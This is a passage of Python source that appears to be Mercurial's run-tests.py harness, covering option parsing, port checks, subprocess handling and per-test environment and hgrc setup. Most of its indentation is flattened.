getcwdb = getattr(os, "getcwdb")
if not getcwdb or os.name == "nt":
getcwdb = lambda: _sys2bytes(os.getcwd())
elif sys.version_info >= (3, 0, 0):
print(
"%s is only supported on Python 3.5+ and 2.7, not %s"
% (sys.argv[0], ".".join(str(v) for v in sys.version_info[:3]))
)
    sys.exit(70) # EX_SOFTWARE from `man 3 sysexits`
else:
PYTHON3 = False
# In python 2.x, path operations are generally done using
# bytestrings by default, so we don't have to do any extra
# fiddling there. We define the wrapper functions anyway just to
# help keep code consistent between platforms.
def _sys2bytes(p):
return p
_bytes2sys = _sys2bytes
osenvironb = os.environ
getcwdb = os.getcwd
# For Windows support
wifexited = getattr(os, "WIFEXITED", lambda x: False)
# Whether to use IPv6
def checksocketfamily(name, port=20058):
"""return true if we can listen on localhost using family=name
    name should be either 'AF_INET' or 'AF_INET6'.
    The port already being in use is okay - EADDRINUSE is treated as success.
"""
family = getattr(socket, name, None)
if family is None:
return False
try:
s = socket.socket(family, socket.SOCK_STREAM)
s.bind(("localhost", port))
s.close()
return True
except socket.error as exc:
if exc.errno == errno.EADDRINUSE:
return True
elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
return False
else:
raise
else:
return False
# useipv6 will be set by parseargs
useipv6 = None
def checkportisavailable(port):
"""return true if a port seems free to bind on localhost"""
if useipv6:
family = socket.AF_INET6
else:
family = socket.AF_INET
try:
with contextlib.closing(socket.socket(family, socket.SOCK_STREAM)) as s:
s.bind(("localhost", port))
return True
except socket.error as exc:
if os.name == "nt" and exc.errno == errno.WSAEACCES:
return False
elif exc.errno not in (
errno.EADDRINUSE,
errno.EADDRNOTAVAIL,
errno.EPROTONOSUPPORT,
):
raise
return False
closefds = os.name == "posix"
def Popen4(cmd, wd, timeout, env=None):
processlock.acquire()
p = subprocess.Popen(
_bytes2sys(cmd),
shell=True,
bufsize=-1,
cwd=_bytes2sys(wd),
env=env,
close_fds=closefds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
processlock.release()
p.fromchild = p.stdout
p.tochild = p.stdin
p.childerr = p.stderr
p.timeout = False
if timeout:
def t():
start = time.time()
while time.time() - start < timeout and p.returncode is None:
time.sleep(0.1)
p.timeout = True
vlog("# Timout reached for process %d" % p.pid)
if p.returncode is None:
terminate(p)
threading.Thread(target=t).start()
return p
if sys.executable:
sysexecutable = sys.executable
elif os.environ.get("PYTHONEXECUTABLE"):
sysexecutable = os.environ["PYTHONEXECUTABLE"]
elif os.environ.get("PYTHON"):
sysexecutable = os.environ["PYTHON"]
else:
raise AssertionError("Could not find Python interpreter")
PYTHON = _sys2bytes(sysexecutable.replace("\\", "/"))
IMPL_PATH = b"PYTHONPATH"
if "java" in sys.platform:
IMPL_PATH = b"JYTHONPATH"
default_defaults = {
"jobs": ("HGTEST_JOBS", multiprocessing.cpu_count()),
"timeout": ("HGTEST_TIMEOUT", 180),
"slowtimeout": ("HGTEST_SLOWTIMEOUT", 1500),
"port": ("HGTEST_PORT", 20059),
"shell": ("HGTEST_SHELL", "sh"),
}
defaults = default_defaults.copy()
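# Each entry above is an (ENVVAR, fallback) pair; getparser() below resolves it
# to type(fallback)(os.environ.get(ENVVAR, fallback)) before seeding argparse,
# so e.g. setting HGTEST_TIMEOUT=300 overrides the 180 second default.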
def canonpath(path):
return os.path.realpath(os.path.expanduser(path))
def parselistfiles(files, listtype, warn=True):
entries = dict()
for filename in files:
try:
path = os.path.expanduser(os.path.expandvars(filename))
f = open(path, "rb")
except IOError as err:
if err.errno != errno.ENOENT:
raise
if warn:
print("warning: no such %s file: %s" % (listtype, filename))
continue
for line in f.readlines():
line = line.split(b"#", 1)[0].strip()
if line:
entries[line] = filename
f.close()
return entries
def parsettestcases(path):
"""read a .t test file, return a set of test case names
If path does not exist, return an empty set.
"""
cases = []
try:
with open(path, "rb") as f:
for l in f:
if l.startswith(b"#testcases "):
cases.append(sorted(l[11:].split()))
except IOError as ex:
if ex.errno != errno.ENOENT:
raise
return cases
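# Illustrative (example line only): a test file containing
#   #testcases serial parallel
# contributes [b'parallel', b'serial'] (sorted) to the list returned above.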
def getparser():
"""Obtain the OptionParser used by the CLI."""
parser = argparse.ArgumentParser(usage="%(prog)s [options] [tests]")
selection = parser.add_argument_group("Test Selection")
selection.add_argument(
"--allow-slow-tests",
action="store_true",
help="allow extremely slow tests",
)
selection.add_argument(
"--blacklist",
action="append",
help="skip tests listed in the specified blacklist file",
)
selection.add_argument(
"--changed",
help="run tests that are changed in parent rev or working directory",
)
selection.add_argument("-k", "--keywords", help="run tests matching keywords")
selection.add_argument(
"-r", "--retest", action="store_true", help="retest failed tests"
)
selection.add_argument(
"--test-list",
action="append",
help="read tests to run from the specified file",
)
selection.add_argument(
"--whitelist",
action="append",
help="always run tests listed in the specified whitelist file",
)
selection.add_argument("tests", metavar="TESTS", nargs="*", help="Tests to run")
harness = parser.add_argument_group("Test Harness Behavior")
harness.add_argument(
"--bisect-repo",
metavar="bisect_repo",
help=("Path of a repo to bisect. Use together with " "--known-good-rev"),
)
harness.add_argument(
"-d",
"--debug",
action="store_true",
help="debug mode: write output of test scripts to console"
" rather than capturing and diffing it (disables timeout)",
)
harness.add_argument(
"-f",
"--first",
action="store_true",
help="exit on the first test failure",
)
harness.add_argument(
"-i",
"--interactive",
action="store_true",
help="prompt to accept changed output",
)
harness.add_argument(
"-j",
"--jobs",
type=int,
help="number of jobs to run in parallel"
" (default: $%s or %d)" % defaults["jobs"],
)
harness.add_argument(
"--keep-tmpdir",
action="store_true",
help="keep temporary directory after running tests",
)
harness.add_argument(
"--known-good-rev",
metavar="known_good_rev",
help=(
"Automatically bisect any failures using this "
"revision as a known-good revision."
),
)
harness.add_argument(
"--list-tests",
action="store_true",
help="list tests instead of running them",
)
harness.add_argument("--loop", action="store_true", help="loop tests repeatedly")
harness.add_argument(
"--random", action="store_true", help="run tests in random order"
)
harness.add_argument(
"--order-by-runtime",
action="store_true",
help="run slowest tests first, according to .testtimes",
)
harness.add_argument(
"-p",
"--port",
type=int,
help="port on which servers should listen"
" (default: $%s or %d)" % defaults["port"],
)
harness.add_argument(
"--profile-runner",
action="store_true",
help="run statprof on run-tests",
)
harness.add_argument(
"-R", "--restart", action="store_true", help="restart at last error"
)
harness.add_argument(
"--runs-per-test",
type=int,
dest="runs_per_test",
help="run each test N times (default=1)",
default=1,
)
harness.add_argument(
"--shell", help="shell to use (default: $%s or %s)" % defaults["shell"]
)
harness.add_argument(
"--showchannels", action="store_true", help="show scheduling channels"
)
harness.add_argument(
"--slowtimeout",
type=int,
help="kill errant slow tests after SLOWTIMEOUT seconds"
" (default: $%s or %d)" % defaults["slowtimeout"],
)
harness.add_argument(
"-t",
"--timeout",
type=int,
help="kill errant tests after TIMEOUT seconds"
" (default: $%s or %d)" % defaults["timeout"],
)
harness.add_argument(
"--tmpdir",
help="run tests in the given temporary directory" " (implies --keep-tmpdir)",
)
harness.add_argument(
"-v", "--verbose", action="store_true", help="output verbose messages"
)
hgconf = parser.add_argument_group("Mercurial Configuration")
hgconf.add_argument(
"--chg",
action="store_true",
help="install and use chg wrapper in place of hg",
)
hgconf.add_argument(
"--chg-debug",
action="store_true",
help="show chg debug logs",
)
hgconf.add_argument(
"--rhg",
action="store_true",
help="install and use rhg Rust implementation in place of hg",
)
hgconf.add_argument("--compiler", help="compiler to build with")
hgconf.add_argument(
"--extra-config-opt",
action="append",
default=[],
help="set the given config opt in the test hgrc",
)
hgconf.add_argument(
"-l",
"--local",
action="store_true",
help="shortcut for --with-hg=<testdir>/../hg, "
"--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, "
"and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
)
hgconf.add_argument(
"--ipv6",
action="store_true",
help="prefer IPv6 to IPv4 for network related tests",
)
hgconf.add_argument(
"--pure",
action="store_true",
help="use pure Python code instead of C extensions",
)
hgconf.add_argument(
"--rust",
action="store_true",
help="use Rust code alongside C extensions",
)
hgconf.add_argument(
"--no-rust",
action="store_true",
help="do not use Rust code even if compiled",
)
hgconf.add_argument(
"--with-chg",
metavar="CHG",
help="use specified chg wrapper in place of hg",
)
hgconf.add_argument(
"--with-rhg",
metavar="RHG",
help="use specified rhg Rust implementation in place of hg",
)
hgconf.add_argument(
"--with-hg",
metavar="HG",
help="test using specified hg script rather than a " "temporary installation",
)
reporting = parser.add_argument_group("Results Reporting")
reporting.add_argument(
"-C",
"--annotate",
action="store_true",
help="output files annotated with coverage",
)
reporting.add_argument(
"--color",
choices=["always", "auto", "never"],
default=os.environ.get("HGRUNTESTSCOLOR", "auto"),
help="colorisation: always|auto|never (default: auto)",
)
reporting.add_argument(
"-c",
"--cover",
action="store_true",
help="print a test coverage report",
)
reporting.add_argument(
"--exceptions",
action="store_true",
help="log all exceptions and generate an exception report",
)
reporting.add_argument(
"-H",
"--htmlcov",
action="store_true",
help="create an HTML report of the coverage of the files",
)
reporting.add_argument(
"--json",
action="store_true",
help="store test result data in 'report.json' file",
)
reporting.add_argument(
"--outputdir",
help="directory to write error logs to (default=test directory)",
)
reporting.add_argument(
"-n", "--nodiff", action="store_true", help="skip showing test changes"
)
reporting.add_argument(
"-S",
"--noskips",
action="store_true",
help="don't report skip tests verbosely",
)
reporting.add_argument(
"--time", action="store_true", help="time how long each test takes"
)
reporting.add_argument("--view", help="external diff viewer")
reporting.add_argument("--xunit", help="record xunit results at specified path")
for option, (envvar, default) in defaults.items():
defaults[option] = type(default)(os.environ.get(envvar, default))
parser.set_defaults(**defaults)
return parser
def parseargs(args, parser):
"""Parse arguments with our OptionParser and validate results."""
options = parser.parse_args(args)
# jython is always pure
if "java" in sys.platform or "__pypy__" in sys.modules:
options.pure = True
if platform.python_implementation() != "CPython" and options.rust:
parser.error("Rust extensions are only available with CPython")
if options.pure and options.rust:
parser.error("--rust cannot be used with --pure")
if options.rust and options.no_rust:
parser.error("--rust cannot be used with --no-rust")
if options.local:
if options.with_hg or options.with_rhg or options.with_chg:
parser.error(
"--local cannot be used with --with-hg or --with-rhg or --with-chg"
)
testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0])))
reporootdir = os.path.dirname(testdir)
pathandattrs = [(b"hg", "with_hg")]
if options.chg:
pathandattrs.append((b"contrib/chg/chg", "with_chg"))
if options.rhg:
pathandattrs.append((b"rust/target/release/rhg", "with_rhg"))
for relpath, attr in pathandattrs:
binpath = os.path.join(reporootdir, relpath)
if os.name != "nt" and not os.access(binpath, os.X_OK):
parser.error(
"--local specified, but %r not found or " "not executable" % binpath
)
setattr(options, attr, _bytes2sys(binpath))
if options.with_hg:
options.with_hg = canonpath(_sys2bytes(options.with_hg))
if not (
os.path.isfile(options.with_hg) and os.access(options.with_hg, os.X_OK)
):
parser.error("--with-hg must specify an executable hg script")
if os.path.basename(options.with_hg) not in [b"hg", b"hg.exe"]:
sys.stderr.write("warning: --with-hg should specify an hg script\n")
sys.stderr.flush()
if (options.chg or options.with_chg) and os.name == "nt":
parser.error("chg does not work on %s" % os.name)
if (options.rhg or options.with_rhg) and os.name == "nt":
parser.error("rhg does not work on %s" % os.name)
if options.with_chg:
options.chg = False # no installation to temporary location
options.with_chg = canonpath(_sys2bytes(options.with_chg))
if not (
os.path.isfile(options.with_chg) and os.access(options.with_chg, os.X_OK)
):
parser.error("--with-chg must specify a chg executable")
if options.with_rhg:
options.rhg = False # no installation to temporary location
options.with_rhg = canonpath(_sys2bytes(options.with_rhg))
if not (
os.path.isfile(options.with_rhg) and os.access(options.with_rhg, os.X_OK)
):
parser.error("--with-rhg must specify a rhg executable")
if options.chg and options.with_hg:
# chg shares installation location with hg
parser.error(
"--chg does not work when --with-hg is specified "
"(use --with-chg instead)"
)
if options.rhg and options.with_hg:
# rhg shares installation location with hg
parser.error(
"--rhg does not work when --with-hg is specified "
"(use --with-rhg instead)"
)
if options.rhg and options.chg:
parser.error("--rhg and --chg do not work together")
if options.color == "always" and not pygmentspresent:
sys.stderr.write(
"warning: --color=always ignored because " "pygments is not installed\n"
)
if options.bisect_repo and not options.known_good_rev:
parser.error("--bisect-repo cannot be used without --known-good-rev")
global useipv6
if options.ipv6:
useipv6 = checksocketfamily("AF_INET6")
else:
# only use IPv6 if IPv4 is unavailable and IPv6 is available
useipv6 = (not checksocketfamily("AF_INET")) and checksocketfamily("AF_INET6")
options.anycoverage = options.cover or options.annotate or options.htmlcov
if options.anycoverage:
try:
import coverage
covver = version.StrictVersion(coverage.__version__).version
if covver < (3, 3):
parser.error("coverage options require coverage 3.3 or later")
except ImportError:
parser.error("coverage options now require the coverage package")
if options.anycoverage and options.local:
# this needs some path mangling somewhere, I guess
parser.error("sorry, coverage options do not work when --local " "is specified")
if options.anycoverage and options.with_hg:
parser.error(
"sorry, coverage options do not work when --with-hg " "is specified"
)
global verbose
if options.verbose:
verbose = ""
if options.tmpdir:
options.tmpdir = canonpath(options.tmpdir)
if options.jobs < 1:
parser.error("--jobs must be positive")
if options.interactive and options.debug:
parser.error("-i/--interactive and -d/--debug are incompatible")
if options.debug:
if options.timeout != defaults["timeout"]:
sys.stderr.write("warning: --timeout option ignored with --debug\n")
if options.slowtimeout != defaults["slowtimeout"]:
sys.stderr.write("warning: --slowtimeout option ignored with --debug\n")
options.timeout = 0
options.slowtimeout = 0
if options.blacklist:
options.blacklist = parselistfiles(options.blacklist, "blacklist")
if options.whitelist:
options.whitelisted = parselistfiles(options.whitelist, "whitelist")
else:
options.whitelisted = {}
if options.showchannels:
options.nodiff = True
return options
def rename(src, dst):
"""Like os.rename(), trade atomicity and opened files friendliness
for existing destination support.
"""
shutil.copy(src, dst)
os.remove(src)
def makecleanable(path):
"""Try to fix directory permission recursively so that the entire tree
can be deleted"""
for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
for d in dirnames:
p = os.path.join(dirpath, d)
try:
os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700) # chmod u+rwx
except OSError:
pass
_unified_diff = difflib.unified_diff
if PYTHON3:
import functools
_unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)
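    # difflib.unified_diff only accepts str sequences on Python 3, so it is
    # wrapped with difflib.diff_bytes here to let the byte-string test output
    # be diffed against the byte-string reference output directly.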
def getdiff(expected, output, ref, err):
servefail = False
lines = []
for line in _unified_diff(expected, output, ref, err):
if line.startswith(b"+++") or line.startswith(b"---"):
line = line.replace(b"\\", b"/")
if line.endswith(b" \n"):
line = line[:-2] + b"\n"
lines.append(line)
if not servefail and line.startswith(
b"+ abort: child process failed to start"
):
servefail = True
return servefail, lines
verbose = False
def vlog(*msg):
"""Log only when in verbose mode."""
if verbose is False:
return
return log(*msg)
# Bytes that break XML even in a CDATA block: control characters 0-31
# sans \t, \n and \r
CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")
# Match feature conditionalized output lines in the form, capturing the feature
# list in group 2, and the preceding line output in group 1:
#
# output..output (feature !)\n
optline = re.compile(br"(.*) \((.+?) !\)\n$")
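# Illustrative match (example line only): for
#   b'  remote: abort: push failed (py3 !)\n'
# group 1 is b'  remote: abort: push failed' and group 2 is b'py3'.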
def cdatasafe(data):
"""Make a string safe to include in a CDATA block.
Certain control characters are illegal in a CDATA block, and
there's no way to include a ]]> in a CDATA either. This function
replaces illegal bytes with ? and adds a space between the ]] so
that it won't break the CDATA block.
"""
return CDATA_EVIL.sub(b"?", data).replace(b"]]>", b"] ]>")
def log(*msg):
"""Log something to stdout.
Arguments are strings to print.
"""
with iolock:
if verbose:
print(verbose, end=" ")
for m in msg:
print(m, end=" ")
print()
sys.stdout.flush()
def highlightdiff(line, color):
if not color:
return line
assert pygmentspresent
return pygments.highlight(
line.decode("latin1"), difflexer, terminal256formatter
).encode("latin1")
def highlightmsg(msg, color):
if not color:
return msg
assert pygmentspresent
return pygments.highlight(msg, runnerlexer, runnerformatter)
def terminate(proc):
"""Terminate subprocess"""
vlog("# Terminating process %d" % proc.pid)
try:
proc.terminate()
except OSError:
pass
def killdaemons(pidfile):
import killdaemons as killmod
return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)
class Test(unittest.TestCase):
"""Encapsulates a single, runnable test.
While this class conforms to the unittest.TestCase API, it differs in that
instances need to be instantiated manually. (Typically, unittest.TestCase
classes are instantiated automatically by scanning modules.)
"""
# Status code reserved for skipped tests (used by hghave).
SKIPPED_STATUS = 80
def __init__(
self,
path,
outputdir,
tmpdir,
keeptmpdir=False,
debug=False,
first=False,
timeout=None,
startport=None,
extraconfigopts=None,
shell=None,
hgcommand=None,
slowtimeout=None,
usechg=False,
chgdebug=False,
useipv6=False,
):
"""Create a test from parameters.
path is the full path to the file defining the test.
tmpdir is the main temporary directory to use for this test.
keeptmpdir determines whether to keep the test's temporary directory
after execution. It defaults to removal (False).
debug mode will make the test execute verbosely, with unfiltered
output.
timeout controls the maximum run time of the test. It is ignored when
debug is True. See slowtimeout for tests with #require slow.
slowtimeout overrides timeout if the test has #require slow.
startport controls the starting port number to use for this test. Each
test will reserve 3 port numbers for execution. It is the caller's
responsibility to allocate a non-overlapping port range to Test
instances.
extraconfigopts is an iterable of extra hgrc config options. Values
must have the form "key=value" (something understood by hgrc). Values
of the form "foo.key=value" will result in "[foo] key=value".
shell is the shell to execute tests in.
"""
if timeout is None:
timeout = defaults["timeout"]
if startport is None:
startport = defaults["port"]
if slowtimeout is None:
slowtimeout = defaults["slowtimeout"]
self.path = path
self.relpath = os.path.relpath(path)
self.bname = os.path.basename(path)
self.name = _bytes2sys(self.bname)
self._testdir = os.path.dirname(path)
self._outputdir = outputdir
self._tmpname = os.path.basename(path)
self.errpath = os.path.join(self._outputdir, b"%s.err" % self.bname)
self._threadtmp = tmpdir
self._keeptmpdir = keeptmpdir
self._debug = debug
self._first = first
self._timeout = timeout
self._slowtimeout = slowtimeout
self._startport = startport
self._extraconfigopts = extraconfigopts or []
self._shell = _sys2bytes(shell)
self._hgcommand = hgcommand or b"hg"
self._usechg = usechg
self._chgdebug = chgdebug
self._useipv6 = useipv6
self._aborted = False
self._daemonpids = []
self._finished = None
self._ret = None
self._out = None
self._skipped = None
self._testtmp = None
self._chgsockdir = None
self._refout = self.readrefout()
def readrefout(self):
"""read reference output"""
# If we're not in --debug mode and reference output file exists,
# check test output against it.
if self._debug:
return None # to match "out is None"
elif os.path.exists(self.refpath):
with open(self.refpath, "rb") as f:
return f.read().splitlines(True)
else:
return []
# needed to get base class __repr__ running
@property
def _testMethodName(self):
return self.name
def __str__(self):
return self.name
def shortDescription(self):
return self.name
def setUp(self):
"""Tasks to perform before run()."""
self._finished = False
self._ret = None
self._out = None
self._skipped = None
try:
os.mkdir(self._threadtmp)
except OSError as e:
if e.errno != errno.EEXIST:
raise
name = self._tmpname
self._testtmp = os.path.join(self._threadtmp, name)
os.mkdir(self._testtmp)
# Remove any previous output files.
if os.path.exists(self.errpath):
try:
os.remove(self.errpath)
except OSError as e:
# We might have raced another test to clean up a .err
# file, so ignore ENOENT when removing a previous .err
# file.
if e.errno != errno.ENOENT:
raise
if self._usechg:
self._chgsockdir = os.path.join(self._threadtmp, b"%s.chgsock" % name)
os.mkdir(self._chgsockdir)
def run(self, result):
"""Run this test and report results against a TestResult instance."""
# This function is extremely similar to unittest.TestCase.run(). Once
# we require Python 2.7 (or at least its version of unittest), this
# function can largely go away.
self._result = result
result.startTest(self)
try:
try:
self.setUp()
except (KeyboardInterrupt, SystemExit):
self._aborted = True
raise
except Exception:
result.addError(self, sys.exc_info())
return
success = False
try:
self.runTest()
except KeyboardInterrupt:
self._aborted = True
raise
except unittest.SkipTest as e:
result.addSkip(self, str(e))
# The base class will have already counted this as a
# test we "ran", but we want to exclude skipped tests
# from those we count towards those run.
result.testsRun -= 1
except self.failureException as e:
# This differs from unittest in that we don't capture
# the stack trace. This is for historical reasons and
# this decision could be revisited in the future,
# especially for PythonTest instances.
if result.addFailure(self, str(e)):
success = True
except Exception:
result.addError(self, sys.exc_info())
else:
success = True
try:
self.tearDown()
except (KeyboardInterrupt, SystemExit):
self._aborted = True
raise
except Exception:
result.addError(self, sys.exc_info())
success = False
if success:
result.addSuccess(self)
finally:
result.stopTest(self, interrupted=self._aborted)
def runTest(self):
"""Run this test instance.
This will return a tuple describing the result of the test.
"""
env = self._getenv()
self._genrestoreenv(env)
self._daemonpids.append(env["DAEMON_PIDS"])
self._createhgrc(env["HGRCPATH"])
vlog("# Test", self.name)
ret, out = self._run(env)
self._finished = True
self._ret = ret
self._out = out
def describe(ret):
if ret < 0:
return "killed by signal: %d" % -ret
return "returned error code %d" % ret
self._skipped = False
if ret == self.SKIPPED_STATUS:
if out is None: # Debug mode, nothing to parse.
missing = ["unknown"]
failed = None
else:
missing, failed = TTest.parsehghaveoutput(out)
if not missing:
missing = ["skipped"]
if failed:
self.fail("hg have failed checking for %s" % failed[-1])
else:
self._skipped = True
raise unittest.SkipTest(missing[-1])
elif ret == "timeout":
self.fail("timed out")
elif ret is False:
self.fail("no result code from test")
elif out != self._refout:
# Diff generation may rely on written .err file.
if (
(ret != 0 or out != self._refout)
and not self._skipped
and not self._debug
):
with open(self.errpath, "wb") as f:
for line in out:
f.write(line)
# The result object handles diff calculation for us.
with firstlock:
if self._result.addOutputMismatch(self, ret, out, self._refout):
# change was accepted, skip failing
return
if self._first:
global firsterror
firsterror = True
if ret:
msg = "output changed and " + describe(ret)
else:
msg = "output changed"
self.fail(msg)
elif ret:
self.fail(describe(ret))
def tearDown(self):
"""Tasks to perform after run()."""
for entry in self._daemonpids:
killdaemons(entry)
self._daemonpids = []
if self._keeptmpdir:
log(
"\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s"
% (
_bytes2sys(self._testtmp),
_bytes2sys(self._threadtmp),
)
)
else:
try:
shutil.rmtree(self._testtmp)
except OSError:
# unreadable directory may be left in $TESTTMP; fix permission
# and try again
makecleanable(self._testtmp)
shutil.rmtree(self._testtmp, True)
shutil.rmtree(self._threadtmp, True)
if self._usechg:
# chgservers will stop automatically after they find the socket
# files are deleted
shutil.rmtree(self._chgsockdir, True)
if (
(self._ret != 0 or self._out != self._refout)
and not self._skipped
and not self._debug
and self._out
):
with open(self.errpath, "wb") as f:
for line in self._out:
f.write(line)
vlog("# Ret was:", self._ret, "(%s)" % self.name)
def _run(self, env):
# This should be implemented in child classes to run tests.
raise unittest.SkipTest("unknown test type")
def abort(self):
"""Terminate execution of this test."""
self._aborted = True
def _portmap(self, i):
offset = b"" if i == 0 else b"%d" % i
return (br":%d\b" % (self._startport + i), b":$HGPORT%s" % offset)
def _getreplacements(self):
"""Obtain a mapping of text replacements to apply to test output.
Test output needs to be normalized so it can be compared to expected
output. This function defines how some of that normalization will
occur.
"""
r = [
# This list should be parallel to defineport in _getenv
self._portmap(0),
self._portmap(1),
self._portmap(2),
(br"([^0-9])%s" % re.escape(self._localip()), br"\1$LOCALIP"),
(br"\bHG_TXNID=TXN:[a-f0-9]{40}\b", br"HG_TXNID=TXN:$ID$"),
]
r.append((self._escapepath(self._testtmp), b"$TESTTMP"))
replacementfile = os.path.join(self._testdir, b"common-pattern.py")
if os.path.exists(replacementfile):
data = {}
with open(replacementfile, mode="rb") as source:
# the intermediate 'compile' step helps with debugging
code = compile(source.read(), replacementfile, "exec")
exec(code, data)
for value in data.get("substitutions", ()):
if len(value) != 2:
msg = "malformatted substitution in %s: %r"
msg %= (replacementfile, value)
raise ValueError(msg)
r.append(value)
return r
def _escapepath(self, p):
if os.name == "nt":
return b"".join(
c.isalpha()
and b"[%s%s]" % (c.lower(), c.upper())
or c in b"/\\"
and br"[/\\]"
or c.isdigit()
and c
or b"\\" + c
for c in [p[i : i + 1] for i in range(len(p))]
)
else:
return re.escape(p)
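# Rough sketch of the Windows branch above, with an assumed input: for
# p == b"C:\\Temp" the generated pattern is roughly
# br"[cC]\:[/\\][tT][eE][mM][pP]", i.e. letters become case-insensitive
# character classes, path separators match either slash, and everything else
# is backslash-escaped.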
def _localip(self):
if self._useipv6:
return b"::1"
else:
return b"127.0.0.1"
def _genrestoreenv(self, testenv):
"""Generate a script that can be used by tests to restore the original
environment."""
# Put the restoreenv script inside self._threadtmp
scriptpath = os.path.join(self._threadtmp, b"restoreenv.sh")
testenv["HGTEST_RESTOREENV"] = _bytes2sys(scriptpath)
# Only restore environment variable names that the shell allows
# us to export.
name_regex = re.compile("^[a-zA-Z][a-zA-Z0-9_]*$")
# Do not restore these variables; otherwise tests would fail.
reqnames = {"PYTHON", "TESTDIR", "TESTTMP"}
with open(scriptpath, "w") as envf:
for name, value in origenviron.items():
if not name_regex.match(name):
# Skip environment variables with unusual names not
# allowed by most shells.
continue
if name in reqnames:
continue
envf.write("%s=%s\n" % (name, shellquote(value)))
for name in testenv:
if name in origenviron or name in reqnames:
continue
envf.write("unset %s\n" % (name,))
def _getenv(self):
"""Obtain environment variables to use during test execution."""
def defineport(i):
offset = "" if i == 0 else "%s" % i
env["HGPORT%s" % offset] = "%s" % (self._startport + i)
env = os.environ.copy()
env["PYTHONUSERBASE"] = sysconfig.get_config_var("userbase") or ""
env["HGEMITWARNINGS"] = "1"
env["TESTTMP"] = _bytes2sys(self._testtmp)
env["TESTNAME"] = self.name
env["HOME"] = _bytes2sys(self._testtmp)
if os.name == "nt":
env["REALUSERPROFILE"] = env["USERPROFILE"]
# py3.8+ ignores HOME: https://bugs.python.org/issue36264
env["USERPROFILE"] = env["HOME"]
formated_timeout = _bytes2sys(b"%d" % default_defaults["timeout"][1])
env["HGTEST_TIMEOUT_DEFAULT"] = formated_timeout
env["HGTEST_TIMEOUT"] = _bytes2sys(b"%d" % self._timeout)
# This number should match portneeded in _getport
for port in xrange(3):
# This list should be parallel to _portmap in _getreplacements
defineport(port)
env["HGRCPATH"] = _bytes2sys(os.path.join(self._threadtmp, b".hgrc"))
env["DAEMON_PIDS"] = _bytes2sys(os.path.join(self._threadtmp, b"daemon.pids"))
env["HGEDITOR"] = '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
env["HGUSER"] = "test"
env["HGENCODING"] = "ascii"
env["HGENCODINGMODE"] = "strict"
env["HGHOSTNAME"] = "test-hostname"
env["HGIPV6"] = str(int(self._useipv6))
# See contrib/catapipe.py for how to use this functionality.
if "HGTESTCATAPULTSERVERPIPE" not in env:
# If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
# non-test one in as a default, otherwise set to devnull
env["HGTESTCATAPULTSERVERPIPE"] = env.get(
"HGCATAPULTSERVERPIPE", os.devnull
)
extraextensions = []
for opt in self._extraconfigopts:
section, key = opt.split(".", 1)
if section != "extensions":
continue
name = key.split("=", 1)[0]
extraextensions.append(name)
if extraextensions:
env["HGTESTEXTRAEXTENSIONS"] = " ".join(extraextensions)
# LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
# IP addresses.
env["LOCALIP"] = _bytes2sys(self._localip())
# This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
# but this is needed for testing python instances like dummyssh,
# dummysmtpd.py, and dumbhttp.py.
if PYTHON3 and os.name == "nt":
env["PYTHONLEGACYWINDOWSSTDIO"] = "1"
# Modified HOME in test environment can confuse Rust tools. So set
# CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
# present and these variables aren't already defined.
cargo_home_path = os.path.expanduser("~/.cargo")
rustup_home_path = os.path.expanduser("~/.rustup")
if os.path.exists(cargo_home_path) and b"CARGO_HOME" not in osenvironb:
env["CARGO_HOME"] = cargo_home_path
if os.path.exists(rustup_home_path) and b"RUSTUP_HOME" not in osenvironb:
env["RUSTUP_HOME"] = rustup_home_path
# Reset some environment variables to well-known values so that
# the tests produce repeatable output.
env["LANG"] = env["LC_ALL"] = env["LANGUAGE"] = "C"
env["TZ"] = "GMT"
env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
env["COLUMNS"] = "80"
env["TERM"] = "xterm"
dropped = [
"CDPATH",
"CHGDEBUG",
"EDITOR",
"GREP_OPTIONS",
"HG",
"HGMERGE",
"HGPLAIN",
"HGPLAINEXCEPT",
"HGPROF",
"http_proxy",
"no_proxy",
"NO_PROXY",
"PAGER",
"VISUAL",
]
for k in dropped:
if k in env:
del env[k]
# unset env related to hooks
for k in list(env):
if k.startswith("HG_"):
del env[k]
if self._usechg:
env["CHGSOCKNAME"] = os.path.join(self._chgsockdir, b"server")
if self._chgdebug:
env["CHGDEBUG"] = "true"
return env
def _createhgrc(self, path):
"""Create an hgrc file for this test."""
with open(path, "wb") as hgrc:
hgrc.write(b"[ui]\n")
hgrc.write(b"slash = True\n")
hgrc.write(b"interactive = False\n")
hgrc.write(b"detailed-exit-code = True\n")
hgrc.write(b"merge = internal:merge\n")
hgrc.write(b"mergemarkers = detailed\n")
hgrc.write(b"promptecho = True\n")
hgrc.write(b"timeout.warn=15\n")
hgrc.write(b"[defaults]\n")
hgrc.write(b"[devel]\n")
hgrc.write(b"all-warnings = true\n")
hgrc.write(b"default-date = 0 0\n")
hgrc.write(b"[largefiles]\n")
hgrc.write(
b"usercache = %s\n"
% (os.path.join(self._testtmp, b".cache/largefiles"))
)
hgrc.write(b"[lfs]\n")
hgrc.write(
b"usercache = %s\n" % (os.path.join(self._testtmp, b".cache/lfs"))
)
hgrc.write(b"[web]\n")
hgrc.write(b"address = localhost\n")
hgrc.write(b"ipv6 = %r\n" % self._useipv6)
hgrc.write(b"server-header = testing stub value\n")
for opt in self._extraconfigopts:
section, key = _sys2bytes(opt).split(b".", 1)
assert b"=" in key, (
"extra config opt %s must " "have an = for assignment" % opt
)
hgrc.write(b"[%s]\n%s\n" % (section, key))
def fail(self, msg):
# unittest differentiates between errored and failed.
# Failed is denoted by AssertionError (by default at least).
raise AssertionError(msg)
